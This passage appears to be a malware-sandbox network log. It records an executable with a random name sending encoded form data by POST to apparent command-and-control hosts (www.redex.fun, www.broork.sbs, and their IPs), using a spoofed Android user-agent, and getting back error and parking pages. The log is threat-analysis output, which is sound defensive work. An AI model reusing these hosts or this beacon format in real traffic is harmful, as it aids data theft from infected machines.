                                                                                                                      Host: www.nutrigenfit.online
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Nov 1, 2024 09:20:07.625102997 CET367INHTTP/1.1 404 Not Found
                                                                                                                      Date: Fri, 01 Nov 2024 08:20:07 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 203
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 68 67 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uhg3/ was not found on this server.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      33192.168.2.462931185.68.16.94803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:20:12.864849091 CET775OUTPOST /pjcb/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.redex.fun
                                                                                                                      Origin: http://www.redex.fun
                                                                                                                      Referer: http://www.redex.fun/pjcb/
                                                                                                                      Content-Length: 203
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 72 54 51 56 4f 45 74 2f 75 58 2b 2b 42 76 75 78 67 68 5a 6b 64 77 6d 31 52 66 2f 6a 65 6e 43 78 50 62 58 4e 41 71 33 50 64 48 44 63 53 78 33 64 2f 44 75 74 6f 34 50 6a 4c 73 58 7a 6d 48 69 59 68 71 44 71 32 6c 51 64 42 67 55 5a 53 69 42 4e 30 31 30 37 6d 47 42 2b 64 38 74 31 6e 35 46 6d 6c 4f 39 76 4f 2f 41 59 44 42 75 39 63 33 36 6d 78 72 32 31 58 70 42 68 37 44 4b 74 6c 45 41 73 2f 48 6e 62 71 4c 2f 77 5a 47 55 73 36 45 37 57 39 4d 37 66 70 54 2b 43 78 6b 75 2b 6e 7a 41 57 6f 6e 38 48 37 51 52 51 51 34 54 49 76 56 52 6a 45 32 38 62 5a 39 32 62 52 34 62 30 79 4d 37 4a 4a 41 3d 3d
                                                                                                                      Data Ascii: sn0PLN=rTQVOEt/uX++BvuxghZkdwm1Rf/jenCxPbXNAq3PdHDcSx3d/Duto4PjLsXzmHiYhqDq2lQdBgUZSiBN0107mGB+d8t1n5FmlO9vO/AYDBu9c36mxr21XpBh7DKtlEAs/HnbqL/wZGUs6E7W9M7fpT+Cxku+nzAWon8H7QRQQ4TIvVRjE28bZ92bR4b0yM7JJA==
                                                                                                                      Nov 1, 2024 09:20:13.732875109 CET332INHTTP/1.1 405 Not Allowed
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 01 Nov 2024 08:20:13 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      x-ray: p529:0.000
                                                                                                                      Data Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 96<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      34192.168.2.462932185.68.16.94803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:20:15.403769016 CET795OUTPOST /pjcb/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.redex.fun
                                                                                                                      Origin: http://www.redex.fun
                                                                                                                      Referer: http://www.redex.fun/pjcb/
                                                                                                                      Content-Length: 223
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 72 54 51 56 4f 45 74 2f 75 58 2b 2b 44 50 65 78 6d 43 42 6b 62 51 6d 79 65 2f 2f 6a 48 33 44 5a 50 62 4c 4e 41 6f 61 4b 64 30 6e 63 53 54 2f 64 2b 42 4b 74 70 34 50 6a 53 63 58 79 72 6e 69 44 68 71 50 69 32 6c 63 64 42 67 41 5a 53 6d 52 4e 31 46 49 30 6e 57 42 38 49 73 74 72 6a 35 46 6d 6c 4f 39 76 4f 2b 6c 39 44 42 6d 39 63 44 47 6d 67 36 32 32 57 70 42 69 38 44 4b 74 75 6b 41 6f 2f 48 6e 35 71 4b 54 4f 5a 41 59 73 36 46 4c 57 38 64 37 63 2b 44 2b 45 79 55 76 32 6a 69 39 2f 6f 58 42 37 31 53 49 31 64 4c 53 76 75 54 63 35 56 48 64 4d 4c 39 53 6f 4d 2f 53 41 2f 50 47 41 53 4f 72 63 79 31 44 67 77 57 6a 4a 48 4f 61 72 7a 71 6f 69 4f 75 51 3d
                                                                                                                      Data Ascii: sn0PLN=rTQVOEt/uX++DPexmCBkbQmye//jH3DZPbLNAoaKd0ncST/d+BKtp4PjScXyrniDhqPi2lcdBgAZSmRN1FI0nWB8Istrj5FmlO9vO+l9DBm9cDGmg622WpBi8DKtukAo/Hn5qKTOZAYs6FLW8d7c+D+EyUv2ji9/oXB71SI1dLSvuTc5VHdML9SoM/SA/PGASOrcy1DgwWjJHOarzqoiOuQ=
                                                                                                                      Nov 1, 2024 09:20:16.307127953 CET332INHTTP/1.1 405 Not Allowed
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 01 Nov 2024 08:20:16 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      x-ray: p529:0.000
                                                                                                                      Data Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 96<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      35192.168.2.462933185.68.16.94803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:20:17.950933933 CET10877OUTPOST /pjcb/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.redex.fun
                                                                                                                      Origin: http://www.redex.fun
                                                                                                                      Referer: http://www.redex.fun/pjcb/
                                                                                                                      Content-Length: 10303
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 72 54 51 56 4f 45 74 2f 75 58 2b 2b 44 50 65 78 6d 43 42 6b 62 51 6d 79 65 2f 2f 6a 48 33 44 5a 50 62 4c 4e 41 6f 61 4b 64 30 76 63 53 67 6e 64 38 67 4b 74 37 49 50 6a 4e 73 58 4a 72 6e 6a 52 68 71 6e 6d 32 6c 42 6f 42 69 34 5a 54 42 35 4e 38 57 51 30 70 6d 42 38 51 63 74 32 6e 35 45 2b 6c 4f 73 6f 4f 2b 31 39 44 42 6d 39 63 46 69 6d 67 72 32 32 55 70 42 68 37 44 4b 62 6c 45 41 41 2f 48 2f 44 71 4b 6d 31 65 77 34 73 36 6c 62 57 2b 72 58 63 39 6a 2b 47 37 45 76 48 6a 69 78 6b 6f 55 30 4b 31 54 39 65 64 4d 69 76 75 56 4e 55 4c 55 4e 58 5a 62 2b 4d 66 2f 69 62 78 73 53 39 64 2b 76 43 69 6c 76 69 6d 56 50 39 45 5a 7a 43 6d 4c 41 6c 62 2b 74 55 53 65 63 76 51 48 50 79 37 6f 4c 61 55 43 43 72 36 71 2b 38 41 6c 6d 44 37 58 71 72 56 35 4b 37 78 71 78 57 6f 41 30 36 32 6d 4e 33 72 4a 62 38 30 39 33 49 52 6e 74 58 6c 67 36 73 65 77 45 67 38 52 63 69 68 70 64 52 6c 56 4d 49 35 74 69 54 48 79 5a 78 57 65 65 5a 4e 6e 35 7a 74 41 75 55 67 70 32 59 57 79 38 4c 4b 49 41 2b 35 78 5a 79 34 76 56 [TRUNCATED]
                                                                                                                      Data Ascii: sn0PLN=rTQVOEt/uX++DPexmCBkbQmye//jH3DZPbLNAoaKd0vcSgnd8gKt7IPjNsXJrnjRhqnm2lBoBi4ZTB5N8WQ0pmB8Qct2n5E+lOsoO+19DBm9cFimgr22UpBh7DKblEAA/H/DqKm1ew4s6lbW+rXc9j+G7EvHjixkoU0K1T9edMivuVNULUNXZb+Mf/ibxsS9d+vCilvimVP9EZzCmLAlb+tUSecvQHPy7oLaUCCr6q+8AlmD7XqrV5K7xqxWoA062mN3rJb8093IRntXlg6sewEg8RcihpdRlVMI5tiTHyZxWeeZNn5ztAuUgp2YWy8LKIA+5xZy4vVFmznHzRxPYB+k6ouS8da8JwFFPKOVM3Gn4cZKGGq7U/fxejxdJDe6O7hcd4xlOx69S72pp7mLL8e6DBPCrJiU6F1PR9t6vEvE167uBiBxLETyXFHgDmNiq8J1Z2NGgteyOa090Iq5DrUc6pPSAE2EX7N1x8O+BDMTScNSdmd5KM1EYdHEpqHkCGKJlmjQ7ZEJAgt0OBTuUhC44PoYsC5SQW253lF4ADczgUIZf0JQMqk8boruh2Dq/r1bvXnwVDyw+ZGlqhuKIj33b4qNQCutUGyLnz1pFRfyLmKCV9PFohNY39rICJKtd0DvtBAQvqNFM9QvQ6PaY0k9q5waRj1eoH7C57E12+l9NmD2Oj77ndiT+5wkcfF+//Tp3FcNKNcTwDCFrEwe2UWvI5UhrkKR1NTUNaEtFQYYlUtz6/2ylt67ZXIpNdI5xL0PCd/fN5dXgEYULpMkgLvdFOjuuHs52kUN0LWfswoEaro8E+w0gaVdsEncio13bWx4eqSZPegmrX85CIv+snF/UZLOxtCXeZDI3h06b0et1w+bYwHsQNhheaCXjkY+ljEDyCoZAzoLLbWqFM4J6C+4Uwf9Ltmvfp6QxpKnw23Kd6lfT8mvVd+IRvMTO058KqD1QYuuro2lQxNZWUbbG1q7iYmhL7SIKeSlsND1phUWA [TRUNCATED]
                                                                                                                      Nov 1, 2024 09:20:18.820733070 CET332INHTTP/1.1 405 Not Allowed
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 01 Nov 2024 08:20:18 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      x-ray: p529:0.000
                                                                                                                      Data Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 96<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      36192.168.2.462934185.68.16.94803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:20:20.491862059 CET526OUTGET /pjcb/?sn0PLN=mR41NwlPpWSeNv3ogRNiaiaxYZXyC1SkAJjbD/qSc2ukVSLu6jyn16P/AoWnmXjc847+20hqOz4nW3sR+UY1qAEpIZA0h6plj49hN8QYEBC/SES4lZybD8k=&xZa=jpgDOVH8PXW8oBA0 HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.redex.fun
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Nov 1, 2024 09:20:21.367784977 CET1236INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 01 Nov 2024 08:20:21 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      x-ray: p529:0.000
                                                                                                                      Data Raw: 31 37 64 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 54 49 54 4c 45 3e d0 a1 d0 b0 d0 b9 d1 82 20 77 77 77 2e 72 65 64 65 78 2e 66 75 6e 20 d0 bd d0 b5 20 d0 bd d0 b0 d1 81 d1 82 d1 80 d0 be d0 b5 d0 bd 20 d0 bd d0 b0 20 d1 81 d0 b5 d1 80 d0 b2 d0 b5 d1 80 d0 b5 3c 2f 54 49 54 4c 45 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 64 6d 2e 74 6f 6f 6c 73 2f 70 61 72 6b 69 6e 67 2d 70 61 67 65 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 [TRUNCATED]
                                                                                                                      Data Ascii: 17d0<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "xhtml11.dtd"><html><head> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8" /> <TITLE> www.redex.fun </TITLE> <link rel="stylesheet" href="https://cdn.adm.tools/parking-page/style.css" type="text/css" /> <script> window.languages = { 'en': { 'title': 'Website www.redex.fun not configured on server', 'h1': 'Website www.redex.fun not configured on server', '.message1': 'Website <b>www.redex.fun</b> is not configured on the hosting server.', '.message2': 'Domain address record points to our server, but this site is not served.<br>If you have recently added a site to your control panel - wait 15 minutes and your site will start working.', '.help_button': 'How can I fix this?', }, 'pl': { 'title': 'Witryna www.redex.fun niesko [TRUNCATED]
                                                                                                                      Nov 1, 2024 09:20:21.367845058 CET1236INData Raw: 61 20 77 77 77 2e 72 65 64 65 78 2e 66 75 6e 20 6e 69 65 73 6b 6f 6e 66 69 67 75 72 6f 77 61 6e 61 20 6e 61 20 73 65 72 77 65 72 7a 65 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 2e 6d 65 73 73 61 67 65 31 27 3a 20 27 57 69 74 72
                                                                                                                      Data Ascii: a www.redex.fun nieskonfigurowana na serwerze', '.message1': 'Witryna <b>www.redex.fun</b> nie jest skonfigurowana na serwerze hostingowym.', '.message2': 'Rekord adresu domeny wskazuje na nasz serwer, ale ta wi
                                                                                                                      Nov 1, 2024 09:20:21.367882967 CET1236INData Raw: 65 78 2e 66 75 6e 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 bb d0 b0 d1 88 d1 82 d0 be d0 b2 d0 b0 d0 bd d0 b8 d0 b9 20 d0 bd d0 b0 20 d1 81 d0 b5 d1 80 d0 b2 d0 b5 d1 80 d1 96 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 2e 6d 65 73 73 61
                                                                                                                      Data Ascii: ex.fun ', '.message1': ' <b>www.redex.fun</b> .', '.message2': '
                                                                                                                      Nov 1, 2024 09:20:21.368396044 CET636INData Raw: 77 77 77 2e 72 65 64 65 78 2e 66 75 6e 20 d0 bd d0 b5 20 d0 bd d0 b0 d1 81 d1 82 d1 80 d0 be d0 b5 d0 bd 20 d0 bd d0 b0 20 d1 81 d0 b5 d1 80 d0 b2 d0 b5 d1 80 d0 b5 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 68 31 27 3a 20 09 09
                                                                                                                      Data Ascii: www.redex.fun ', 'h1': ' www.redex.fun ', '.message1': ' <b>www.redex.fun</b>
                                                                                                                      Nov 1, 2024 09:20:21.368457079 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 27 2e 68 65 6c 70 5f 62 75 74 74 6f 6e 27 3a 20 27 d0 9a d0 b0 d0 ba 20 d1 8d d1 82 d0 be 20 d0 b8 d1 81 d0 bf d1 80 d0 b0 d0 b2 d0 b8 d1 82 d1 8c 3f 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: '.help_button': ' ?', } }; function display(){ let default_lang = 'en', browser_lang = window.navigator.language || navigator.userLanguage,
                                                                                                                      Nov 1, 2024 09:20:21.368874073 CET698INData Raw: 20 20 20 d0 90 d0 b4 d1 80 d0 b5 d1 81 d0 bd d0 b0 d1 8f 20 d0 b7 d0 b0 d0 bf d0 b8 d1 81 d1 8c 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d0 b0 20 d1 81 d1 81 d1 8b d0 bb d0 b0 d0 b5 d1 82 d1 81 d1 8f 20 d0 bd d0 b0 20 d0 bd d0 b0 d1 88 20 d1 81 d0 b5 d1
                                                                                                                      Data Ascii: , .<br>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      37192.168.2.462935163.44.176.12803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:20:27.093945980 CET778OUTPOST /51fd/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.broork.sbs
                                                                                                                      Origin: http://www.broork.sbs
                                                                                                                      Referer: http://www.broork.sbs/51fd/
                                                                                                                      Content-Length: 203
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 30 56 37 42 66 4b 51 68 55 73 4b 76 35 39 47 56 4a 54 2b 6f 72 4b 55 66 73 52 61 35 79 56 50 48 78 64 73 58 31 7a 64 71 39 35 33 5a 33 35 2b 75 66 65 77 68 66 6d 76 52 58 6e 4a 72 41 43 45 51 53 6c 65 47 66 52 6f 38 2f 6b 69 4e 43 38 76 33 32 4b 75 64 52 76 42 63 6d 47 65 66 50 69 4f 73 4a 39 4d 33 55 66 41 50 6e 75 67 45 64 33 72 58 2f 79 6d 42 4e 43 38 54 6d 39 4b 63 50 4e 71 44 4c 65 76 39 6f 73 52 57 43 56 6f 69 52 57 4a 78 69 35 4a 78 65 48 62 4f 52 37 51 30 62 46 4f 58 39 75 57 31 68 36 73 5a 6e 62 72 6d 41 66 69 77 50 63 4c 55 61 67 78 6d 43 44 74 38 73 35 62 61 2b 67 3d 3d
                                                                                                                      Data Ascii: sn0PLN=0V7BfKQhUsKv59GVJT+orKUfsRa5yVPHxdsX1zdq953Z35+ufewhfmvRXnJrACEQSleGfRo8/kiNC8v32KudRvBcmGefPiOsJ9M3UfAPnugEd3rX/ymBNC8Tm9KcPNqDLev9osRWCVoiRWJxi5JxeHbOR7Q0bFOX9uW1h6sZnbrmAfiwPcLUagxmCDt8s5ba+g==
                                                                                                                      Nov 1, 2024 09:20:27.968399048 CET1236INHTTP/1.1 404 Not Found
                                                                                                                      Connection: close
                                                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                      pragma: no-cache
                                                                                                                      content-type: text/html
                                                                                                                      content-length: 1251
                                                                                                                      date: Fri, 01 Nov 2024 08:20:27 GMT
                                                                                                                      server: LiteSpeed
                                                                                                                      vary: User-Agent
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0
                                                                                                                      Nov 1, 2024 09:20:27.968461037 CET271INData Raw: 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20
                                                                                                                      Data Ascii: .15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this si


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      38192.168.2.462936163.44.176.12803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:20:29.635776043 CET798OUTPOST /51fd/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.broork.sbs
                                                                                                                      Origin: http://www.broork.sbs
                                                                                                                      Referer: http://www.broork.sbs/51fd/
                                                                                                                      Content-Length: 223
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
